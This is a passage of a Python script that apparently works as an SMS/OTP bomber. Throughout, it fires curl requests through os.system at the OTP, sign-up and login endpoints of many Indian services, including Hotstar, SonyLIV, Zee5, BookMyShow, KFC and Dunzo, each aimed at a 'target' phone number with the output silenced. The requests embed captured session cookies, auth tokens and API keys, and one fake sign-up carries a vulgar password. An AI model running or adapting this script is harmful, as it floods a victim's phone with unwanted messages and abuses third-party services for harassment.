stickyLyftBrowserId=ktYIIUcbQRMdDASa3mEtGdXp' -H 'TE: Trailers' --data-raw '{"phone_number":"+91'''+target+'''","extend_token_lifetime":false,"ui_variant":"RiderWebOnboardingV1"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://api.hotstar.com/um/v3/users/f37c1eeb647b4b329ad8d212550a51ed/register?register-by=phone_otp' -X PUT -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.hotstar.com/in' -H 'Content-Type: application/json' -H 'X-HS-Device-Id: 2623ddb9-8849-49d4-b6bd-1be6ab8f9a8a' -H 'X-Country-Code: IN' -H 'X-HS-Platform: PCTV' -H 'X-Request-Id: 2623ddb9-8849-49d4-b6bd-1be6ab8f9a8a' -H 'X-HS-AppVersion: 6.97.0' -H 'hotstarauth: st=1605941888~exp=1605947888~acl=/um/v3/*~hmac=45bf48ac9726a96ec616cc05d1871aec49f8d51b23f150f8322ee721143d51c3' -H 'X-HS-UserToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ1bV9hY2Nlc3MiLCJleHAiOjE2MDY1NDY2MDAsImlhdCI6MTYwNTk0MTgwMCwiaXNzIjoiVFMiLCJzdWIiOiJ7XCJoSWRcIjpcImYzN2MxZWViNjQ3YjRiMzI5YWQ4ZDIxMjU1MGE1MWVkXCIsXCJwSWRcIjpcIjljZDQyZDEwYWZhNDQ0MzU4MzQwYTY5MWRmMjE2OWM1XCIsXCJuYW1lXCI6XCJHdWVzdCBVc2VyXCIsXCJpcFwiOlwiMTAzLjI0OS4yMzMuNzBcIixcImNvdW50cnlDb2RlXCI6XCJpblwiLFwiY3VzdG9tZXJUeXBlXCI6XCJudVwiLFwidHlwZVwiOlwiZ3Vlc3RcIixcImlzRW1haWxWZXJpZmllZFwiOmZhbHNlLFwiaXNQaG9uZVZlcmlmaWVkXCI6ZmFsc2UsXCJkZXZpY2VJZFwiOlwiMjYyM2RkYjktODg0OS00OWQ0LWI2YmQtMWJlNmFiOGY5YThhXCIsXCJwcm9maWxlXCI6XCJBRFVMVFwiLFwidmVyc2lvblwiOlwidjJcIixcInN1YnNjcmlwdGlvbnNcIjp7XCJpblwiOnt9fSxcImlzc3VlZEF0XCI6MTYwNTk0MTgwMDg1M30iLCJ2ZXJzaW9uIjoiMV8wIn0._2-mZ84PQX5ls_P-Nkorc-OBP0y7RaUVCBGmLggJp0s' -H 'Origin: https://www.hotstar.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw '{"phone_number":"'''+target+'''","country_prefix":"91"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://us-central1-vootdev.cloudfunctions.net/usersV3/v3/checkUser' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.voot.com/' -H 'Content-Type: application/json;charset=utf-8' -H 'Origin: https://www.voot.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw '{"type":"mobile","mobile":"'''+target+'''","countryCode":"+91"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://apiv2.sonyliv.com/AGL/1.6/A/ENG/WEB/IN/CREATEOTP' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/json' -H 'x-via-device: true' -H 'security_token: eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2MDU5NDEwNDEsImV4cCI6MTYwNzIzNzA0MSwiYXVkIjoiKi5zb255bGl2LmNvbSIsImlzcyI6IlNvbnlMSVYiLCJzdWIiOiJzb21lQHNldGluZGlhLmNvbSJ9.Ec_TZkyW_oLPDxsV_98fqSVS8tMUpM2TqZDmUbou3e1Il-2GiES8SPaXbnPugb_Tk8sA8jCGXWz6HdrCClds2NGDbzZKbAQm_A4HmWC_lChX9EP1rEnhaFEUJpqQ6Lyq7hunIzYwkVhuxnn_kui779soOOj1gyp436o8wwx6lt3mvAWrCUD7N9cVdtkMkYZqj7FslMb-GyA9g5q9iQ1wS8NYET10x8V3LvMIRjOyqY4eB-p_d6V3MYseLNqzBmh-59_3k3z7jVs5W0TKRjmVa3UW8RZw-aexWCuYUW3vYiwP6LhN2pfr_qVYL23nvedW0bSleAbhaJ0zo3vVst9XX2za0uzMxc1K0BZPYL5sAKCdWwvDDbpjOvAn0q_6y6iSeqLCPK2qpylL1tq5az-fpvLVz_6nB-KJp8wf64tKgjSl-AT_hfD6CroLm33QmFsDrKPGnNOK8wVbXbAosi9rK_nJm2lNys8RtpNKW3TDEEdnKN614rDIyzsniJm0u-mULjhkwkyFXrMuQzXLghf08eYO68YqUGTzm4sb2rka8cObFWqiyNs9RpZ1Y49uB3bm4BIS_vnF6V4YSgwg5bZPvsyAWEVdZ09Xv3b87oYh0eKRYVPv9qWtGXe3Ph3YKSeaKBGt9q1476Hju2OdbNZTf0zY3VFoKCPVO9Y-2OZfvg4' -H 'app_version: 3.1.83' -H 'device_id: 7b86369547be4f3cbedad7b216375689-1605942443823' -H 'session_id: 99ec927de94146feac91062a8de05040-1605942443889' -H 'Origin: https://www.sonyliv.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw '{"mobileNumber":"'''+target+'''","channelPartnerID":"MSMIND","country":"IN","timestamp":"2020-11-21T07:07:43.865Z","otpSize":6}' > /dev/null 2>&1
''')
os.system('''
curl 'https://b2bapi.zee5.com/device/sendotp_v1.php?phoneno=91'''+target+'''' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.zee5.com/verify-mobile-number' -H 'Origin: https://www.zee5.com' -H 'Connection: keep-alive' -H 'TE: Trailers' > /dev/null 2>&1
''')
os.system('''
curl 'https://in.bookmyshow.com/pwa/api/uapi/otp/send' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://in.bookmyshow.com/explore/home/goa' -H 'Content-Type: application/json' -H 'Origin: https://in.bookmyshow.com' -H 'Connection: keep-alive' -H 'Cookie: __cfduid=d4d85ebda6240e7ebfacde35464f1ad691605943730; bmsId=1.369259481.1605943730519; rgn=%7B%22regionNameSlug%22%3A%22goa%22%2C%22regionCodeSlug%22%3A%22goa%22%2C%22regionName%22%3A%22Goa%22%2C%22regionCode%22%3A%22GOA%22%2C%22subName%22%3A%22%22%2C%22subCode%22%3A%22%22%2C%22Lat%22%3A%2215.378%22%2C%22Long%22%3A%2274.019%22%7D; preferences=%7B%22ticketType%22%3A%22M-TICKET%22%7D; _gcl_au=1.1.1059617916.1605943794; __cfruid=7429a7cb4644726666245c0734b598a450e351f2-1605943748; WZRK_S_RK4-47R-98KZ=%7B%22p%22%3A1%2C%22s%22%3A1605943776%2C%22t%22%3A1605943830%7D; WZRK_G=4fcd821ef5f64d14995572463d8a0ba7; sessionId=1605943830395; AMP_TOKEN=%24NOT_FOUND; tvc_bmscookie=GA1.2.870453991.1605943833; tvc_bmscookie_gid=GA1.2.1045120677.1605943833; _fbp=fb.1.1605943834287.980745622; G_ENABLED_IDPS=google' -H 'TE: Trailers' --data-raw '{"channel":"phone","subChannel":"sms","details":{"phone":"'''+target+'''","origin":"https://in.bookmyshow.com"}}' > /dev/null 2>&1
''')
os.system('''
curl 'https://ap2-prod-direct.discoveryplus.in/authentication/sendOTP' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://auth.discoveryplus.in/login/otp?flow=OTPLogin' -H 'content-type: application/json' -H 'x-disco-client: WEB:x86_64:WEB_AUTH:1.0.56' -H 'X-disco-params: realm=dplusindia' -H 'Origin: https://auth.discoveryplus.in' -H 'Connection: keep-alive' -H 'Cookie: _fbp=fb.1.1605944649588.1741712393; AMCV_9AE0F0145936E3790A495CAA%40AdobeOrg=359503849%7CMCIDTS%7C18588%7CMCMID%7C50321376618791551040084359461297439908%7CMCAAMLH-1606549451%7C12%7CMCAAMB-1606549451%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1605951851s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.0.1; AMCVS_9AE0F0145936E3790A495CAA%40AdobeOrg=1; st=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJVU0VSSUQ6ZHBsdXNpbmRpYTpkZDA2MzAwNC1hMTNjLTQwZmQtOGQwNS1mZTlhOTJkYTYzNDIiLCJqdGkiOiJ0b2tlbi1jMTc0YTY0Yy03MThmLTQ0YTgtYTVhNS0yMWZhOWM2YTZjNmQiLCJhbm9ueW1vdXMiOnRydWUsImlhdCI6MTYwNTk0NDYwMn0.kRX3uXzy4rM_fue36mBVtW3FO--vwKXy3sevJNZo2DA; gpv_Page=auth%3Aaccount-login-otp; s_ppv=https%253A%2F%2Fauth.discoveryplus.in%2Flogin%2Fotp%253Fflow%253DOTPLogin%2C100%2C100%2C541%2C1%2C1; s_ips=541; s_tp=541; s_plt=2.35; s_pltp=undefined; s_nr30=1605944808863-New; s_cc=true; __gads=ID=99a8de6228209493:T=1605944608:S=ALNI_MY58UJLp3axcPLhxyjMzpWxYfJG-A; s_sq=discoverydpdiscoveryplusdev%3D%2526c.%2526a.%2526activitymap.%2526page%253Dhttps%25253A%25252F%25252Fauth.discoveryplus.in%25252Flogin%25253Fflow%25253DOTPLogin%2526link%253DResend%252520OTP%2526region%253Dcontest-wrapper%2526.activitymap%2526.a%2526.c%2526pid%253Dhttps%25253A%25252F%25252Fauth.discoveryplus.in%25252Flogin%25253Fflow%25253DOTPLogin%2526oid%253Dfunctionur%252528%252529%25257B%25257D%2526oidt%253D2%2526ot%253DDIV' -H 'TE: Trailers' --data-raw '{"destination":"91'''+target+'''","channel":"sms"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://udbreg.nimo.tv/sms/send/reg' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://udbreg.nimo.tv/web/middle/2.1/48432542/https' -H 'lcid: 1033' -H 'uri: 20009' -H 'reqid: 48546920' -H 'context: WB-d10d5dd3ce3d4dc4a6039ca2f767e952-C92520807E90000145901ACFF50057F0-0a47694e10c8b85fa2022b252c25d7d6' -H 'content-type: application/json;charset=UTF-8' -H 'Connection: keep-alive' -H 'Cookie: country=IN; lang=1033; ccountry=IN; clang=1081; __yamid_new=C92520807E90000145901ACFF50057F0; __yasmid=0.9028449856389107; _yasids=__rootsid%3DC92520808CA00001CA5F64F4178E10F9; _ga=GA1.2.1878377613.1605945412; _gid=GA1.2.1164645722.1605945412; theme=2; guid=0a47694e10c8b85fa2022b252c25d7d6; ya_popup_login_from=signup_bt; udb_guiddata=d10d5dd3ce3d4dc4a6039ca2f767e952' -H 'TE: Trailers' --data-raw '{"uri":"20009","version":"2.1","context":"WB-d10d5dd3ce3d4dc4a6039ca2f767e952-C92520807E90000145901ACFF50057F0-0a47694e10c8b85fa2022b252c25d7d6","appId":"1005","lcid":"1033","byPass":"2","requestId":"48546920","data":{"phone":"0091'''+target+'''"}}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.abhibus.com/sendOtp' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.abhibus.com/account/sign_in' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: AWSALB=HIOoqRpGJuV69+uwFFRHOIli2Joi2lwFqsLhMBYO/k80Fp34Lty6+oxKhIt8Rknm9y/oB4SDyZ6qEg+kT0lCMz5Avj7bE8JqQpHYCdRNW2oApA+fG2eXC8xdZnZG; AWSALBCORS=HIOoqRpGJuV69+uwFFRHOIli2Joi2lwFqsLhMBYO/k80Fp34Lty6+oxKhIt8Rknm9y/oB4SDyZ6qEg+kT0lCMz5Avj7bE8JqQpHYCdRNW2oApA+fG2eXC8xdZnZG; ci_session=Sby3XFGhcgNSPWSWHNbqqv6Be1O6%2FwPGW1RY9OXx6B4veATlgolAzAiYzO8narYQ%2FgAMIPMfmPPFzfxrntI%2BruaR1sfj46ofecUJ0twNneGa9rPt2EBfNeH0AjGbrBujCJGPfaXDFHNcqoxkhaTQ0MTbLKW6sZgBMtcsXJ7z0HUQx88yN3BWEbkC3X7XP02KOdWkSXys7dIh9M2b4KU07k9GNd8FK49Ow9E5qOPkZYlokQpek4WWMyzg6ZUGMo5iS%2Fbp8WPiN12aWxtzBkMGqYS5UFlGxxStg1gofAPti%2BErpv78K6QEjnKf%2FP09nKxdUfN%2F8E27PyIKhGqUNXtwVK6YUviN%2BIXpMUJnIN3gJtHubHxyZVFhboQLRXnZuOHt7I8JmE2LweSaUgrAPRvWjeM6NNuCPsVDmT7QZs75vGsAJ9DblmWzHPddo82Y0RPJd%2B0JZWvplXfvM%2F2wmTPv9k5vHjqJeGavfUZEhuJHTdforYCaoyMc4hAxO%2Bd5BmYV; AKA_A2=A; ak_bmsc=00D3D20BB023715D18A5EFC1B5BDF67B312C5F1FCE2C0000F8CDB85FF9C4100B~pluOADqSm7WhUoBJBNRn+spUzJpeITa6EDjBouSaNo/YBcmtS65TnSbB3N38c31BH3ThcCc7yMHKCSPWatBZGdsVOUHPxTTkXwuwXp/CxxJaTNyFcKES0jEPnAj6FHoiuQ33eBCGvqxhEFcFNNFLoIOeud8vhiRFXw59u9ZfDaIC6IIGmW1HkPpl+a/JB28uXtk/8sTzE0aaT144doSE4POB2S2slMV3HNg8l4trV2vuP/3gru+NQDDhNRVnn7SJke; __asc=a680cca7175e9e5773689dd9156; __auc=a680cca7175e9e5773689dd9156; WZRK_S_R95-8KW-K75Z=%7B%22p%22%3A1%2C%22s%22%3A1605946879%2C%22t%22%3A1605946932%7D; WZRK_G=925cce25e1f545539299fc0ee72c2bb8; _gcl_au=1.1.983957309.1605946932; _fbp=fb.1.1605946932796.2088702601; _ga=GA1.2.1042381544.1605946933; _gid=GA1.2.1781041860.1605946933; _gat_gtag_UA_6315501_1=1; _gat_UA-6315501-1=1; __gads=ID=b7b906592c2abfcb-2292f69cd9c4005f:T=1605946880:RT=1605946880:S=ALNI_Mam7VFc-3axU37meaLiBA5NSmz1UA; PHPSESSID=k3m16r4m5756lu73d80efttp22; bm_sv=7D7A9F918E245F6D4D5716B839C79AC6~mdYaMg/oC9h2IhbwLgim23YbbkmkuzsuG/sGoGB27IxDE0Kn4c7ezZ7+tgs48nEvjgIx9mM69m/Gz0Asf+1tWbXhm3CTgd9t2PST31hcDlVaCkRrnwDBaQsJMl5xH6wWloD5OI8OliuPcKAwX5smzn18nGqP/EvpuBR5BhpKzzE=; G_ENABLED_IDPS=google' -H 'TE: Trailers' --data-raw 'mobile='''+target+'''&referralCode=' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.urbanclap.com/api/v2/growth/profile/generateOTP' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'X-device-os: desktop_web' -H 'X-device-id: ucu451db-994b3d23f1-a756-af62-9ed1-688f1e8063-1605947448812' -H 'X-version-name: web_v4.160.0' -H 'X-version-code: 4.160.0' -H 'X-client-key: f4113c23a68c9cb3bf695c4490f9f3da9abc8674712f5b870906ec26bab7602aed85ad71640e8d9f785ea09db5a298a950b335adc5b8cbb6ce58209e2912eac6' -H 'Cache-Control: no-cache' -H 'Content-Type: application/json;charset=utf-8' -H 'Origin: https://www.urbancompany.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw '{"country_id":"IND","phone":{"isd_code":"+91","phone_wo_isd":"'''+target+'''"},"device_type":"customer"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://grofers.com/v2/accounts/' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://grofers.com/' -H 'Content-Type: application/x-www-form-urlencoded' -H 'auth_key: 7f4a2aeda55434ff9218591e1379c3fc24260df4df8088ffdcc54f592d9103b1' -H 'app_client: consumer_web' -H 'device_id: 3ab76446-3a11-4ea6-a0a7-8fc2ae71bcf0' -H 'Lat: 28.4465616' -H 'Lon: 77.040489' -H 'Origin: https://grofers.com' -H 'Connection: keep-alive' -H 'Cookie: __cfduid=da9108fd4a73e7349392734637db5e4411605948005; gr_1_deviceId=3ab76446-3a11-4ea6-a0a7-8fc2ae71bcf0; city=Ahmedabad; __cfruid=a9307b78d3993519256a5fe2ed837a13127f3559-1605948006; _gcl_au=1.1.217980137.1605948061; gr_1_lat=23.1090643329249; gr_1_lon=72.5715186777276; gr_1_locality=959; ajs_anonymous_id=%2290d1883e-67db-4d3e-998c-3f463e41c33f%22; _sp_ses.bf41=*; _sp_id.bf41=82322e787b13febf.1605948065.1.1605948065.1605948065.3d722cce-daaa-4035-b1fd-3f6559dd27f0; _ga=GA1.2.697558095.1605948065; _gid=GA1.2.1044998150.1605948065; _gat_UA-85989319-1=1; WZRK_S_RKR-99Z-ZK5Z=%7B%22p%22%3A1%2C%22s%22%3A1605948016%2C%22t%22%3A1605948079%7D; rl_anonymous_id=%22d71d5897-9c78-4a70-8373-6fd524ca4ada%22; rl_user_id=%22%22; WZRK_G=a0c7984d8c284b7da12d112cb4c4bbdf; _uetsid=4ced05102bd511ebb2a28d556b8900ac; _uetvid=4cedabd02bd511eb97922ffe7a17227c; _hjid=af04b224-baca-4475-a9ad-62935e6c6e9e; _hjFirstSeen=1; __insp_wid=180455199; __insp_slim=1605948070605; __insp_nv=true; __insp_targlpu=aHR0cHM6Ly9ncm9mZXJzLmNvbS8%3D; __insp_targlpt=T25saW5lIEdyb2NlcnkgU3RvcmU6IEJ1eSBPbmxpbmUgR3JvY2VyeSBmcm9tIEluZGlhJ3MgQmVzdCBPbmxpbmUgU3VwZXJtYXJrZXQgYXQgRGlzY291bnRlZCBSYXRlcyB8IEdyb2ZlcnM%3D; _fbp=fb.1.1605948070960.726802374; _hjAbsoluteSessionInProgress=0; __insp_norec_sess=true' -H 'TE: Trailers' --data-raw 'user_phone='''+target+'''' > /dev/null 2>&1
''')
os.system('''
curl 'https://api.starquik.com/v3/users/register' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.starquik.com/' -H 'device: desktop' -H 'storeid: 1' -H 'version: 1.0' -H 'temptoken: b21ab397b8fae3d4e6cb44a0b0c516ea8f86d13e' -H 'Content-Type: text/plain' -H 'Origin: https://www.starquik.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data-raw '{"uemail":"kuchbhi@gmail.com","number":"'''+target+'''","password":"Teri@makichut1234","fname":"rider","devicetoken":"dsdb2sbd732hgsdv","quote_id":""}' > /dev/null 2>&1
''')
os.system('''
curl 'https://online.kfc.co.in/OTP/ResendOTPToPhoneForLogin?ts=1605948543950' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://online.kfc.co.in/login' -H 'Content-Type: application/json;charset=utf-8' -H '__RequestVerificationToken: 1Jth_chy15gB7zsGswSMmQJrZCyXXdQ7BrzvdL4zD_sfeD49Hfo48Scbjftv1q0uCjg5d9miweyZ-ZVwmp7HN9Ct3TRd4Dixv8ekAIB0apU1:IltF22zAce93VpQPp9lP9aznLuORmk3NYfnMb4xMKPP9XmtHy-0UUSS4SicIezbGiKjj_IhTp2QFo4u6iwZCq8Vo_SdSYvzhOghFdxbxSSU1' -H 'Connection: keep-alive' -H 'Cookie: AWSALB=xf3DIycxIycEG57RWNTKfJ89bLoJKoTJqjZODCh1CRvwp5jDYWzYZ1LRPFf6ESOl3zFIhZT+GoihhhRV/b6x2RHBAkxOFeAL1kYyClz+v5SVRlWA7JpTjlkvYVwA; AWSALBCORS=xf3DIycxIycEG57RWNTKfJ89bLoJKoTJqjZODCh1CRvwp5jDYWzYZ1LRPFf6ESOl3zFIhZT+GoihhhRV/b6x2RHBAkxOFeAL1kYyClz+v5SVRlWA7JpTjlkvYVwA; KFCI.A.SID=3ep3bk0mgtgvwfe23lgwre5w; KFCI.OM=None; KFCI.ASD=False; KFCI.IPO=False; KFCI.CHNL=All; KFCI.ReMe=False; KFCI.LC=en-US; KFCI.IMS=False; ak_bmsc=601D6DFD97A7A7C23C23D27C79EA2395B856F837C87D000034D4B85F272FF338~plSZSF7W+5QNdRdGKpmkPoCFR/qIkwZu9ZDAXkPCblNnuHoCGV1hhHZuqil+FvnKWrTEWkhuMCBWxVuyqpvRuxvev+1S4UrTSGkia9N1OOQMHRZIDf0B2DiBXag4MnZsF8XHTCYFrjdDbZwLVaJHl+LLcGZX8qvtG6dAN27L7iUDv3oeAuMBn1oyILdXtSpr9MEeh8/pxTdbFwUC8/5ZTCOa/PZlo94qNG/Y17z7hvbLwFpLBlXbAsfJRgPpu6wbTU; _gcl_au=1.1.1360240744.1605948523; _uetsid=5c1c9ee02bd611ebbefc8140f7b21fa4; _uetvid=5c1d2fa02bd611eba86359d80e07782e; _ga=GA1.3.2027297284.1605948523; _gid=GA1.3.247181489.1605948523; _gat_UA-39424837-1=1; bm_sv=E087B4A6FBEFD32352D2FEAFE60FE4A1~KZEi10oJuKAg7quCwDActlsnFSqqSxYjddn0sPjHrouUd7BCyexVxvOHH7b/bLzN++SgZW+o2w1gQWquFoGOU2GJg4IQaFraoHYtuQKiThFSZ0iI7i7nlWjCwDBocQp4fOT21KnARdFugaedLrcabE/qhLcIhGCHNVkCpJsEtPg=; bm_mi=38E5F96C27513D686854F79819BBDAE6~IOopVe3NvvSt3CGOvHQmpWAVvz3RtNaKcL7jfKDHMJwC8pw2CA5z6AlHF2M+LieFzag/zLaV7jnE1yzmpBYxmVs400+pcWKd+VrfOmPT5RJGbkMh7SsY9n8wXfB7dFp6SmTinE3HdmVsecEnusiYlF9FPyl4YWXpSJGdxqyX+qY0kNxQCYAjin2IekFXaZWbGNEqM8w/nYqD5x8Bwumcm+wTgPdi+7Q/4nEfppwtCyt73gvqo2ykmIz2LwVtWkVoIoQnR9+CDj3cZCMAViA7lRhpEuNvuqNRsOomwxtc3qk=; _fbp=fb.2.1605948524686.1722815359' -H 'TE: Trailers' --data-raw '{"phoneNumber":"'''+target+'''","AuthorizedFor":"3","Resend":"false"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.dunzo.com/api/v0/auth/sign-up' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.dunzo.com/mumbai' -H 'X-APP-TYPE: PWA_WEB' -H 'X-APP-VERSION: 2.0.0' -H 'Content-Type: application/json;charset=utf-8' -H 'x-csrf-token: amsZF9Iz-nQrMrSUlGOHhQFjm_oV4DhY2wlc' -H 'Connection: keep-alive' -H 'Cookie: dz_e=ZjAwNmE1YmMtYThjNC00NzFiLThhOTItNTExMjA4NTIzN2UzX3Yx; connect.sid=s%3A3ywZEa3mEhYx4KdNOrxqbPwkht-H7R8O.%2Bctmbheg057DICTL%2Bcx5EYM3CkzlCnzXa3Zsg1L%2B35I; WZRK_S_46R-KR9-WZ5Z=%7B%22p%22%3A1%2C%22s%22%3A1605948593%2C%22t%22%3A1605948646%7D; lux_uid=160594864203567282; WZRK_G=0e0a9f8578a54f0188709b3d692ca079; _gcl_au=1.1.1322093315.1605948646; _ga_MH9JSX933B=GS1.1.1605948645.1.0.1605948645.0; _ga=GA1.2.1981897832.1605948647; _gid=GA1.2.1590119548.1605948647; _gat_UA-74154936-4=1; _fbp=fb.1.1605948646953.916332621' -H 'TE: Trailers' --data-raw '{"phone":"'''+target+'''"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.mykirana.com/index.php?route=feed/api/v2/account/sendOtp&key=98f13708210194c475687be6106a3b99' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.mykirana.com/index.php?route=product/seller_list' -H 'X-NewRelic-ID: Vg4HUFFRDBAFUlhWBwcFV1A=' -H 'newrelic: eyJ2IjpbMCwxXSwiZCI6eyJ0eSI6IkJyb3dzZXIiLCJhYyI6IjI4MDE3MjQiLCJhcCI6IjU2OTQ1MDcxNCIsImlkIjoiMTgyZThhOWMxYzI2MWUzNiIsInRyIjoiZTRlMjA3YzA0NmE1ZWRiZWQ2NzNkMzcwYjg4ZDg4NjAiLCJ0aSI6MTYwNTk0OTA0ODIyMn19' -H 'traceparent: 00-e4e207c046a5edbed673d370b88d8860-182e8a9c1c261e36-01' -H 'tracestate: 2801724@nr=0-1-2801724-569450714-182e8a9c1c261e36----1605949048222' -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: KARTROCKETSESS=v2g913iu3hv3f7mo4k9hievqr0; device=W; language=en; customer_logged=0; country=NA; currency=INR; AMCV_36A37AC159F1E4EE0A495C6A%40AdobeOrg=-715282455%7CMCIDTS%7C18588%7CMCMID%7C50283778257614435430087371647250465747%7CMCAAMLH-1606553772%7C12%7CMCAAMB-1606553772%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1605956172s%7CNONE%7CvVersion%7C4.2.0; _ga=GA1.2.1261557396.1605948970; _gat_u0=1; _gat_u1=1; cus_device=102503ec62c47fd8bcf197e7d1388137; AMCVS_36A37AC159F1E4EE0A495C6A%40AdobeOrg=1; s_getNewRepeat=1605949048236-New; s_ppn=%7C%7Cbrand%20site%7C%7C%7C%7Cseller%20list; s_ppvl=%257C%257Cbrand%2520site%257C%257C%257C%257Cseller%2520list%2C32%2C32%2C541%2C1366%2C541%2C1366%2C673%2C1%2CP; s_ppv=%257C%257Cbrand%2520site%257C%257C%257C%257Cseller%2520list%2C35%2C32%2C541%2C772%2C541%2C1366%2C673%2C1%2CP; s_ptc=0.00%5E%5E0.00%5E%5E0.00%5E%5E0.00%5E%5E0.64%5E%5E0.03%5E%5E7.99%5E%5E0.12%5E%5E8.82; s_cc=true; aam_uuid=49800726440750807020135898942490834682; area=Town+Hall+%28Mumbai%29; pincode=400001; s_sq=%5B%5BB%5D%5D' --data-raw '{"otp_type":"login","mobile":'''+target+'''}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.licious.in/onboarding/check-user' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.licious.in/' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-CSRF-TOKEN: g850kc3OanDf0JgwV88Hlb5AZUIDUmfTHUNoVt6M' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: XSRF-TOKEN=eyJpdiI6ImJ1N1hTRkNETzI1M0ZpUTdkM1pIckE9PSIsInZhbHVlIjoiWVBYbmlCd1plbUJyeDhpK2RFcFROWVwvZjR3cWNkMFBhNmhyc1ErMks4ZE5BVlFCY0F3Q1E0N1RjZE1oSVVoOWJJY3YxUUp3bDlvYlZ1UmxnRm9hK3JRPT0iLCJtYWMiOiI0NDAxODY0OTYxNmFlOWI5YzM3MDFlZTcyMzJkOGI5YmRkYmEyM2Q0MDJhYTQ4ODgyNTViZDEzMzY1YmQyYzE4In0%3D; licious_session=eyJpdiI6Im5LbnIzSG15QjB1QVhJdGxLbUdEWmc9PSIsInZhbHVlIjoicnZwSWk5NThzeHJieUZ4UjUwSWVEZHhnS1RSbGVWM1dIaFlRUEZoenZBWjJHTkwwWEZXVnlCcDdoTHU4aXZWRkFSK2VFUEd2R29rdHE4dTdSQVFGTGc9PSIsIm1hYyI6IjUzYjRkZGYxNzQ2MWUxNmM4OWIxMzVlOGJhNjU5MDQzZWUyNTc1NmZiODVkMmUwNzc3MTQyOGNjYzc5NTA1OTQifQ%3D%3D; WZRK_S_445-488-5W5Z=%7B%22p%22%3A1%2C%22s%22%3A1605949666%2C%22t%22%3A1605949720%7D; WZRK_G=e3fd8bc1334443dba842659c6d34f2c3; 